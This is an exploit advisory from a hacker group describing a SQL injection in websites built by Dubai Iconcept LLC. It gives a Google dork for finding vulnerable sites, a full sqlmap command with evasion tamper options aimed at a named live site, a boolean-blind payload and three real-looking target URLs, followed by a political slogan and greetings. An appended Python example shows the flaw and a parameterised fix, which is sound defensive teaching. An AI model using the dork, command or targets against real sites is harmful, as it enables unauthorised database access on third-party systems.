Dubai Iconcept LLC Sql Injection Vulnerability

2017.12.22
Turkz.org (TR)
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

#################################################################################
# Exploit Title: Dubai Iconcept LLC Sql Injection Vulnerability
# Author : TrazeR & Sipahiler & TurkZ.org
# Google Dork : intext:"Powered by Iconcept LLC" inurl:pr_id=
# Tested on : Kali Linux 2017.3
# Date : 22.12.2017
# Vendor Home: http://iconceptme.com/
# Blog : http://www.trazer.org/
# Forum : http://www.turkz.org/Forum/
# Telegram: https://t.me/turkzgrup
#################################################################################

Tutorial :

[+] Dorking In Google Or Other Search Engine
[+] Sqlmap Or Manual
[+] Manager: localhost.com/admin/
[+] Sql GET Parameter "pr_id" Is Vulnerable.

Command:

root@TrazeR:~# sqlmap --level=5 --risk=3 --threads=10 --timeout=10 --random-agent --text-only --no-cast -u "http://www.maqammed.ae/product.php?pr_id=258" --tamper=space2comment,randomcase --dbs

Parameter: pr_id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: pr_id=258 AND 7960=7960

Demo Sql:

http://www.dynaspex.com/safinat/product.php?pr_id=1480#popup1
http://www.cvision.ae/product.php?pr_id=39
http://www.maqammed.ae/product.php?pr_id=258

FREE PALESTINE & FREE GAZA ===> İSREAL TERRORIST #KUDUS İSLAMİNDİR!

Greet'Zzz : ABIKANBEY & EfendiBey & Atabey & TrazeR & Zer0day & Kutluhan & Göçebe & BlueTrojen
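Why the reported boolean-based blind result indicates injection in "pr_id", and what the server-side fix looks like, as an added example that is not part of the original advisory or the vendor's code. The table, column and function names are assumptions, an in-memory SQLite database stands in for the site's backend, and the always-false value is a constructed counterpart to the payload above.

```python
import sqlite3

# Constructed stand-in for the shop database; table and column names are assumptions.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE products (pr_id INTEGER PRIMARY KEY, name TEXT)")
    db.executemany("INSERT INTO products VALUES (?, ?)",
                   [(39, "sample item A"), (258, "sample item B")])
    return db

def lookup_vulnerable(db, pr_id):
    # The flaw (CWE-89): the raw GET value is concatenated into the SQL text.
    sql = "SELECT name FROM products WHERE pr_id = " + pr_id
    return db.execute(sql).fetchall()

def parse_pr_id(raw):
    # Allow-list validation: pr_id must be a short run of ASCII digits.
    if not (raw.isascii() and raw.isdigit() and len(raw) <= 9):
        raise ValueError("pr_id must be a positive integer")
    return int(raw)

def lookup_hardened(db, pr_id):
    # Validate, then bind the value as a parameter so it is never parsed as SQL.
    return db.execute("SELECT name FROM products WHERE pr_id = ?",
                      (parse_pr_id(pr_id),)).fetchall()

def responses_differ(lookup, db):
    """True if the result depends on a condition supplied inside pr_id."""
    true_case = "258 AND 7960=7960"   # payload reported in the advisory
    false_case = "258 AND 7960=7961"  # constructed always-false counterpart
    results = []
    for value in (true_case, false_case):
        try:
            results.append(lookup(db, value))
        except ValueError:
            results.append("rejected")
    return results[0] != results[1]

if __name__ == "__main__":
    db = make_db()
    print("vulnerable exposes a boolean oracle:", responses_differ(lookup_vulnerable, db))
    print("hardened exposes a boolean oracle:  ", responses_differ(lookup_hardened, db))
```

The same check works as a regression test after a fix: a page whose output changes between the always-true and always-false forms of the parameter is still building SQL from the raw value.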


